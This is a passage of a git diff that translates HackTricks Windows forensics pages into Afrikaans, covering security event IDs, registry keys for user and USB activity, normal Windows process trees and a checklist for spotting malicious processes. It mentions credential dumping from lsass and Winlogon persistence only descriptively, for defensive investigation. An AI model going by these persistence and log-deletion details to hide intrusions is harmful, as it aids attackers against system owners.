guide](https://www.alteredsecurity.com/post/fantastic-windows-logon-types-and-where-to-find-credentials-in-them). +Vir praktiese voorbeelde van die simulasie van hierdie aanmeldingstipes en geleenthede vir legitimasie-onttrekking, verwys na [Altered Security se gedetailleerde gids](https://www.alteredsecurity.com/post/fantastic-windows-logon-types-and-where-to-find-credentials-in-them). -Event details, including status and sub-status codes, provide further insights into event causes, particularly notable in Event ID 4625. +Gebeurtenisbesonderhede, insluitend status- en substatuskodes, bied verdere insig in die oorsake van gebeure, ver +#### Stelselkraggebeure -### Recovering Windows Events +EventID 6005 dui op stelselbegin, terwyl EventID 6006 afsluiting aandui. -To enhance the chances of recovering deleted Windows Events, it's advisable to power down the suspect computer by directly unplugging it. **Bulk_extractor**, a recovery tool specifying the `.evtx` extension, is recommended for attempting to recover such events. +#### Logverwydering -### Identifying Common Attacks via Windows Events - -For a comprehensive guide on utilizing Windows Event IDs in identifying common cyber attacks, visit [Red Team Recipe](https://redteamrecipe.com/event-codes/). - -#### Brute Force Attacks - -Identifiable by multiple EventID 4625 records, followed by an EventID 4624 if the attack succeeds. - -#### Time Change - -Recorded by EventID 4616, changes to system time can complicate forensic analysis. - -#### USB Device Tracking - -Useful System EventIDs for USB device tracking include 20001/20003/10000 for initial use, 10100 for driver updates, and EventID 112 from DeviceSetupManager for insertion timestamps. - -#### System Power Events - -EventID 6005 indicates system startup, while EventID 6006 marks shutdown. - -#### Log Deletion - -Security EventID 1102 signals the deletion of logs, a critical event for forensic analysis. +Veiligheid EventID 1102 dui op die verwydering van logboeke, 'n kritieke gebeurtenis vir forensiese analise.
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFT's**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
diff --git a/forensics/basic-forensic-methodology/windows-forensics/interesting-windows-registry-keys.md b/forensics/basic-forensic-methodology/windows-forensics/interesting-windows-registry-keys.md index 593954531..be12560e8 100644 --- a/forensics/basic-forensic-methodology/windows-forensics/interesting-windows-registry-keys.md +++ b/forensics/basic-forensic-methodology/windows-forensics/interesting-windows-registry-keys.md @@ -1,106 +1,87 @@ -# Interesting Windows Registry Keys +# Interessante Windows-registernøkke -### Interesting Windows Registry Keys +### Interessante Windows-registernøkke
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
-### **Windows Version and Owner Info** -- Located at **`Software\Microsoft\Windows NT\CurrentVersion`**, you'll find the Windows version, Service Pack, installation time, and the registered owner's name in a straightforward manner. +### **Windows-weergawe en eienaarinligting** +- Onder **`Software\Microsoft\Windows NT\CurrentVersion`** sal jy die Windows-weergawe, dienspakket, installasie-tyd en die geregistreerde eienaar se naam op 'n maklike manier vind. -### **Computer Name** -- The hostname is found under **`System\ControlSet001\Control\ComputerName\ComputerName`**. +### **Rekenaarnaam** +- Die rekenaarnaam word gevind onder **`System\ControlSet001\Control\ComputerName\ComputerName`**. -### **Time Zone Setting** -- The system's time zone is stored in **`System\ControlSet001\Control\TimeZoneInformation`**. +### **Tydsone-instelling** +- Die stelsel se tydsone word gestoor in **`System\ControlSet001\Control\TimeZoneInformation`**. -### **Access Time Tracking** -- By default, the last access time tracking is turned off (**`NtfsDisableLastAccessUpdate=1`**). To enable it, use: - `fsutil behavior set disablelastaccess 0` +### **Toegangstydopsporing** +- Standaard is die laaste toegangstydopsporing afgeskakel (**`NtfsDisableLastAccessUpdate=1`**). Om dit in te skakel, gebruik: +`fsutil behavior set disablelastaccess 0` -### Windows Versions and Service Packs -- The **Windows version** indicates the edition (e.g., Home, Pro) and its release (e.g., Windows 10, Windows 11), while **Service Packs** are updates that include fixes and, sometimes, new features. +### Windows-weergawes en dienspakette +- Die **Windows-weergawe** dui die uitgawe aan (bv. Home, Pro) en sy vrystelling (bv. Windows 10, Windows 11), terwyl **dienspakette** opdaterings is wat herstelwerk en soms nuwe funksies insluit. -### Enabling Last Access Time -- Enabling last access time tracking allows you to see when files were last opened, which can be critical for forensic analysis or system monitoring. +### Aktivering van laaste toegangstyd +- Die aktivering van laaste toegangstydopsporing stel jou in staat om te sien wanneer lêers laas geopen is, wat krities kan wees vir forensiese analise of stelselmonitering. -### Network Information Details -- The registry holds extensive data on network configurations, including **types of networks (wireless, cable, 3G)** and **network categories (Public, Private/Home, Domain/Work)**, which are vital for understanding network security settings and permissions. +### Netwerkinligtingbesonderhede +- Die register bevat uitgebreide data oor netwerk-konfigurasies, insluitend **netwerksoorte (draadloos, kabel, 3G)** en **netwerkkategorieë (Openbaar, Privaat/Tuis, Domein/Werk)**, wat belangrik is vir die verstaan van netwerksekuriteitsinstellings en toestemmings. -### Client Side Caching (CSC) -- **CSC** enhances offline file access by caching copies of shared files. Different **CSCFlags** settings control how and what files are cached, affecting performance and user experience, especially in environments with intermittent connectivity. +### Kliëntkant-caching (CSC) +- **CSC** verbeter die toegang tot lêers buite lyn deur kopieë van gedeelde lêers te kas. Verskillende **CSCFlags**-instellings beheer hoe en watter lêers gekas word, wat die prestasie en gebruikerservaring beïnvloed, veral in omgewings met onderbroke konnektiwiteit. -### AutoStart Programs -- Programs listed in various `Run` and `RunOnce` registry keys are automatically launched at startup, affecting system boot time and potentially being points of interest for identifying malware or unwanted software. +### Outomatiese beginprogramme +- Programme wat in verskillende `Run`- en `RunOnce`-registernøkke gelys word, word outomaties by opstart geloods, wat die stelselopstarttyd beïnvloed en moontlik punte van belang kan wees om kwaadwillige sagteware of ongewenste sagteware te identifiseer. ### Shellbags -- **Shellbags** not only store preferences for folder views but also provide forensic evidence of folder access even if the folder no longer exists. They are invaluable for investigations, revealing user activity that isn't obvious through other means. +- **Shellbags** stoor nie net voorkeure vir vouer-aansigte nie, maar verskaf ook forensiese bewyse van vouertoegang selfs as die vouer nie meer bestaan nie. Dit is van onskatbare waarde vir ondersoeke en onthul gebruikersaktiwiteit wat nie duidelik is deur ander middels nie. -### USB Information and Forensics -- The details stored in the registry about USB devices can help trace which devices were connected to a computer, potentially linking a device to sensitive file transfers or unauthorized access incidents. +### USB-inligting en forensika +- Die besonderhede wat in die register oor USB-toestelle gestoor word, kan help om vas te stel watter toestelle aan 'n rekenaar gekoppel was, moontlik 'n toestel aan gevoelige lêeroordragte of ongemagtigde toegangsgevalle te koppel. -### Volume Serial Number -- The **Volume Serial Number** can be crucial for tracking the specific instance of a file system, useful in forensic scenarios where file origin needs to be established across different devices. +### Volume-seriëlenommer +- Die **Volume-seriëlenommer** kan van kritieke belang wees vir die opsporing van die spesifieke instansie van 'n lêersisteem, wat nuttig is in forensiese scenario's waar lêeroorsprong oor verskillende toestelle vasgestel moet word. -### **Shutdown Details** -- Shutdown time and count (the latter only for XP) are kept in **`System\ControlSet001\Control\Windows`** and **`System\ControlSet001\Control\Watchdog\Display`**. +### **Afsluitingsbesonderhede** +- Afsluitingstyd en telling (laasgenoemde slegs vir XP) word in **`System\ControlSet001\Control\Windows`** en **`System\ControlSet001\Control\Watchdog\Display`** gehou. -### **Network Configuration** -- For detailed network interface info, refer to **`System\ControlSet001\Services\Tcpip\Parameters\Interfaces{GUID_INTERFACE}`**. -- First and last network connection times, including VPN connections, are logged under various paths in **`Software\Microsoft\Windows NT\CurrentVersion\NetworkList`**. +### **Netwerk-konfigurasie** +- Vir gedetailleerde netwerkinterface-inligting, verwys na **`System\ControlSet001\Services\Tcpip\Parameters\Interfaces{GUID_INTERFACE}`**. +- Eerste en laaste netwerkverbindings-tye, insluitend VPN-verbindings, word gelog onder verskillende paaie in **`Software\Microsoft\Windows NT\CurrentVersion\NetworkList`**. -### **Shared Folders** -- Shared folders and settings are under **`System\ControlSet001\Services\lanmanserver\Shares`**. The Client Side Caching (CSC) settings dictate offline file availability. +### **Gedeelde vouers** +- Gedeelde vouers en instellings is onder **`System\ControlSet001\Services\lanmanserver\Shares`**. Die Kliëntkant-caching (CSC) instellings bepaal die beskikbaarheid van lêers buite lyn. -### **Programs that Start Automatically** -- Paths like **`NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Run`** and similar entries under `Software\Microsoft\Windows\CurrentVersion` detail programs set to run at startup. +### **Programme wat outomaties begin** +- Paaie soos **`NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Run`** en soortgelyke inskrywings onder `Software\Microsoft\Windows\CurrentVersion` beskryf programme wat by opstart ingestel is om uit te voer. -### **Searches and Typed Paths** -- Explorer searches and typed paths are tracked in the registry under **`NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer`** for WordwheelQuery and TypedPaths, respectively. +### **Soektogte en getikte paaie** +- Ontdekkingsreisiger-soektogte en getikte paaie word in die register onder **`NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer`** vir WordwheelQuery en TypedPaths, onderskeidelik, gevolg. -### **Recent Documents and Office Files** -- Recent documents and Office files accessed are noted in `NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs` and specific Office version paths. +### **Onlangse dokumente en Office-lêers** +- Onlangse dokumente en Office-lêers wat geopen is, word aangeteken in `NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs` en spesifieke Office-weergawepaaie. -### **Most Recently Used (MRU) Items** -- MRU lists, indicating recent file paths and commands, are stored in various `ComDlg32` and `Explorer` subkeys under `NTUSER.DAT`. +### **Mees onlangs gebruikte (MRU) items** +- MRU-lyste, wat onlangse lêerpaaie en opdragte aandui, word gestoor in verskillende `ComDlg32`- en `Explorer`-subnøkke onder `NTUSER.DAT`. -### **User Activity Tracking** -- The User Assist feature logs detailed application usage stats, including run count and last run time, at **`NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{GUID}\Count`**. +### **Gebruikersaktiwiteitopsporing** +- Die Gebruikerhulp-funksie hou gedetailleerde toepassingsgebruikstatistieke by, insluitend uitvoertelling en laaste uitvoertyd, by **`NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{GUID}\Count`**. -### **Shellbags Analysis** -- Shellbags, revealing folder access details, are stored in `USRCLASS.DAT` and `NTUSER.DAT` under `Software\Microsoft\Windows\Shell`. Use **[Shellbag Explorer](https://ericzimmerman.github.io/#!index.md)** for analysis. +### **Shellbags-analise** +- Shellbags, wat vouertoegangsdetails onthul, word gestoor in `USRCLASS.DAT` en `NTUSER.DAT` onder `Software\Microsoft\Windows\Shell`. Gebruik **[Shellbag Explorer](https://ericzimmerman.github.io/#!index.md)** vir analise. -### **USB Device History** -- **`HKLM\SYSTEM\ControlSet001\Enum\USBSTOR`** and **`HKLM\SYSTEM\ControlSet001\Enum\USB`** contain rich details on connected USB devices, including manufacturer, product name, and connection timestamps. -- The user associated with a specific USB device can be pinpointed by searching `NTUSER.DAT` hives for the device's **{GUID}**. -- The last mounted device and its volume serial number can be traced through `System\MountedDevices` and `Software\Microsoft\Windows NT\CurrentVersion\EMDMgmt`, respectively. - -This guide condenses the crucial paths and methods for accessing detailed system, network, and user activity information on Windows systems, aiming for clarity and usability. - - - -
- -Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! - -Other ways to support HackTricks: - -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
+### **USB-toestelgeskiedenis** +- **`HKLM\SYSTEM\ControlSet001\Enum\USBSTOR`** en **`HKLM\SYSTEM\ControlSet001\Enum\USB`** bevat ryk besonderhede oor gekoppelde USB-toestelle, insluitend vervaardiger, produknaam en koppeltydstempels. +- Die gebruiker wat met 'n spesifieke USB-toestel diff --git a/forensics/basic-forensic-methodology/windows-forensics/windows-processes.md b/forensics/basic-forensic-methodology/windows-forensics/windows-processes.md index b7d5d37fb..bd6765a2b 100644 --- a/forensics/basic-forensic-methodology/windows-forensics/windows-processes.md +++ b/forensics/basic-forensic-methodology/windows-forensics/windows-processes.md @@ -1,147 +1,137 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslag.
## smss.exe -**Session Manager**.\ -Session 0 starts **csrss.exe** and **wininit.exe** (**OS** **services**) while Session 1 starts **csrss.exe** and **winlogon.exe** (**User** **session**). However, you should see **only one process** of that **binary** without children in the processes tree. +**Sessiebestuurder**.\ +Sessie 0 begin **csrss.exe** en **wininit.exe** (**OS-dienste**) terwyl Sessie 1 **csrss.exe** en **winlogon.exe** (**Gebruiker-sessie**) begin. Jy behoort egter **slegs een proses** van daardie **binêre lêer** sonder kinders in die prosesseboom te sien. -Also, sessions apart from 0 and 1 may mean that RDP sessions are occurring. +Daarbenewens kan sessies anders as 0 en 1 beteken dat RDP-sessies plaasvind. ## csrss.exe -**Client/Server Run Subsystem Process**.\ -It manages **processes** and **threads**, makes the **Windows** **API** available for other processes and also **maps drive letters**, create **temp files**, and handles the **shutdown** **process**. +**Kliënt/Bediener Uitvoeringsondersteuningsproses**.\ +Dit bestuur **prosesse** en **drade**, maak die **Windows API** beskikbaar vir ander prosesse en **koppel stuurprogramme aan**, skep **tydelike lêers**, en hanteer die **afsluitingsproses**. -There is one **running in Session 0 and another one in Session 1** (so **2 processes** in the processes tree). Another one is created **per new Session**. +Daar is een wat in Sessie 0 loop en nog een in Sessie 1 (dus **2 prosesse** in die prosesseboom). Nog een word geskep **per nuwe Sessie**. ## winlogon.exe -**Windows Logon Process**.\ -It's responsible for user **logon**/**logoffs**. It launches **logonui.exe** to ask for username and password and then calls **lsass.exe** to verify them. +**Windows Aantekenproses**.\ +Dit is verantwoordelik vir gebruiker **aanmelding**/**afmelding**. Dit begin **logonui.exe** om vir gebruikersnaam en wagwoord te vra en roep dan **lsass.exe** aan om dit te verifieer. -Then it launches **userinit.exe** which is specified in **`HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon`** with key **Userinit**. +Daarna begin dit **userinit.exe** wat gespesifiseer word in **`HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon`** met die sleutel **Userinit**. -Mover over, the previous registry should have **explorer.exe** in the **Shell key** or it might be abused as a **malware persistence method**. +Daarbenewens moet die vorige register **explorer.exe** in die **Shell-sleutel** hê, anders kan dit misbruik word as 'n **kwaadwillige volhardingsmetode**. ## wininit.exe -**Windows Initialization Process**. \ -It launches **services.exe**, **lsass.exe**, and **lsm.exe** in Session 0. There should only be 1 process. +**Windows Inisialisasieproses**. \ +Dit begin **services.exe**, **lsass.exe**, en **lsm.exe** in Sessie 0. Daar behoort slegs 1 proses te wees. ## userinit.exe -**Userinit Logon Application**.\ -Loads the **ntduser.dat in HKCU** and initialises the **user** **environment** and runs **logon** **scripts** and **GPO**. +**Userinit Aanmeldingsprogram**.\ +Laai die **ntuser.dat in HKCU** en inisialiseer die **gebruikersomgewing** en voer **aanmeldingskripte** en **GPO** uit. -It launches **explorer.exe**. +Dit begin **explorer.exe**. ## lsm.exe -**Local Session Manager**.\ -It works with smss.exe to manipulate user sessions: Logon/logoff, shell start, lock/unlock desktop, etc. +**Plaaslike Sessiebestuurder**.\ +Dit werk saam met smss.exe om gebruikersessies te manipuleer: Aanmelding/afmelding, skerm begin, skerm sluit/ontsluit, ens. -After W7 lsm.exe was transformed into a service (lsm.dll). +Na W7 is lsm.exe omskep in 'n diens (lsm.dll). -There should only be 1 process in W7 and from them a service running the DLL. +Daar behoort slegs 1 proses in W7 te wees en daarvandaan 'n diens wat die DLL uitvoer. ## services.exe -**Service Control Manager**.\ -It **loads** **services** configured as **auto-start** and **drivers**. +**Diensbeheerder**.\ +Dit **laai** **dienste** wat as **outomatiese aanvang** en **bestuurders** gekonfigureer is. -It's the parent process of **svchost.exe**, **dllhost.exe**, **taskhost.exe**, **spoolsv.exe** and many more. +Dit is die ouerproses van **svchost.exe**, **dllhost.exe**, **taskhost.exe**, **spoolsv.exe** en nog baie meer. -Services are defined in `HKLM\SYSTEM\CurrentControlSet\Services` and this process maintains a DB in memory of service info that can be queried by sc.exe. +Dienste word gedefinieer in `HKLM\SYSTEM\CurrentControlSet\Services` en hierdie proses onderhou 'n databasis in die geheue van diensinligting wat deur sc.exe ondervra kan word. -Note how **some** **services** are going to be running in a **process of their own** and others are going to be **sharing a svchost.exe process**. +Let daarop hoe **sommige** **dienste** in 'n **eie proses** sal loop en ander sal 'n **svchost.exe-proses deel**. -There should only be 1 process. +Daar behoort slegs 1 proses te wees. ## lsass.exe -**Local Security Authority Subsystem**.\ -It's responsible for the user **authentication** and create the **security** **tokens**. It uses authentication packages located in `HKLM\System\CurrentControlSet\Control\Lsa`. +**Plaaslike Sekuriteitsowerheidsondersteuning**.\ +Dit is verantwoordelik vir die gebruiker se **verifikasie** en skep die **sekuriteitstokens**. Dit gebruik verifikasiepakkette wat in `HKLM\System\CurrentControlSet\Control\Lsa` geleë is. -It writes to the **Security** **event** **log** and there should only be 1 process. +Dit skryf na die **Sekuriteit-gebeurtenislogboek** en daar behoort slegs 1 proses te wees. -Keep in mind that this process is highly attacked to dump passwords. +Hou in gedagte dat hierdie proses hoogs aangeval word om wagwoorde te dump. ## svchost.exe -**Generic Service Host Process**.\ -It hosts multiple DLL services in one shared process. +**Generiese Diensgasheerproses**.\ +Dit bied onderdak aan verskeie DLL-dienste in een gedeelde proses. -Usually, you will find that **svchost.exe** is launched with the `-k` flag. This will launch a query to the registry **HKEY\_LOCAL\_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost** where there will be a key with the argument mentioned in -k that will contain the services to launch in the same process. +Gewoonlik sal jy vind dat **svchost.exe** met die `-k` vlag geloods word. Dit sal 'n navraag na die register **HKEY\_LOCAL\_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost** loods waar daar 'n sleutel met die genoemde argument sal wees wat die dienste bevat wat in dieselfde proses geloods moet word. -For example: `-k UnistackSvcGroup` will launch: `PimIndexMaintenanceSvc MessagingService WpnUserService CDPUserSvc UnistoreSvc UserDataSvc OneSyncSvc` +Byvoorbeeld: `-k UnistackSvcGroup` sal loods: `PimIndexMaintenanceSvc MessagingService WpnUserService CDPUserSvc UnistoreSvc UserDataSvc OneSyncSvc` -If the **flag `-s`** is also used with an argument, then svchost is asked to **only launch the specified service** in this argument. +As die **vlag `-s`** ook saam met 'n argument gebruik word, word svchost gevra om **slegs die gespesifiseerde diens** in hierdie argument te loods. -There will be several processes of `svchost.exe`. If any of them is **not using the `-k` flag**, then that's very suspicious. If you find that **services.exe is not the parent**, that's also very suspicious. +Daar sal verskeie prosesse van `svchost.exe` wees. As een van hulle **nie die `-k` vlag gebruik nie**, is dit baie verdag. As jy vind dat **services.exe nie die ouerproses is nie**, is dit ook baie verdag. ## taskhost.exe -This process act as a host for processes running from DLLs. It also loads the services that are running from DLLs. +Hierdie proses tree op as 'n gasheer vir prosesse wat van DLL's loop. Dit laai ook die dienste wat van DLL's loop. -In W8 this is called taskhostex.exe and in W10 taskhostw.exe. +In W8 word dit taskhostex.exe genoem en in W10 taskhostw.exe. ## explorer.exe -This is the process responsible for the **user's desktop** and launching files via file extensions. +Hierdie is die proses wat verantwoordelik is vir die **gebruiker se lessenaar** en die loods van lêers via lêeruitbreidings. -**Only 1** process should be spawned **per logged on user.** +**Slegs 1** proses behoort **per aangemelde gebruiker** gegenereer te word. -This is run from **userinit.exe** which should be terminated, so **no parent** should appear for this process. +Dit word uitgevoer vanaf **userinit.exe** wat beëindig moet word, sodat **geen ouerproses** vir hierdie proses moet verskyn nie. -# Catching Malicious Processes +# Vang kwaadwillige prosesse -* Is it running from the expected path? (No Windows binaries run from temp location) -* Is it communicating with weird IPs? -* Check digital signatures (Microsoft artifacts should be signed) -* Is it spelled correctly? -* Is running under the expected SID? -* Is the parent process the expected one (if any)? -* Are the children processes the expecting ones? (no cmd.exe, wscript.exe, powershell.exe..?) +* Loop dit vanaf die verwagte pad? (Geen Windows-binêre lêers loop vanaf 'n tydelike plek nie) +* Kommunikeer dit met vreemde IP-adresse? +* Kontroleer digitale handtekeninge (Microsoft-artefakte moet onderteken wees) +* Is dit korrek gespel? +* Loop dit onder die verwagte SID? +* Is die ouerproses die verwagte een (indien enige)? +* Is die kinderprosesse die verwagte (geen cmd.exe, wscript.exe, powershell.exe nie)?
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! - -Other ways to support HackTricks: - -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
+Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! +Ander maniere om HackTricks te ondersteun: +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, ky diff --git a/generic-methodologies-and-resources/basic-forensic-methodology/image-acquisition-and-mount.md b/generic-methodologies-and-resources/basic-forensic-methodology/image-acquisition-and-mount.md index ebacbbf4d..d42400eed 100644 --- a/generic-methodologies-and-resources/basic-forensic-methodology/image-acquisition-and-mount.md +++ b/generic-methodologies-and-resources/basic-forensic-methodology/image-acquisition-and-mount.md @@ -1,46 +1,53 @@ -# Image Acquisition & Mount +# Beeldverwerwing & Monteer
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)! -* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. +* Werk jy in 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy adverteer in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of laai HackTricks in PDF af**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die [hacktricks repo](https://github.com/carlospolop/hacktricks) en [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
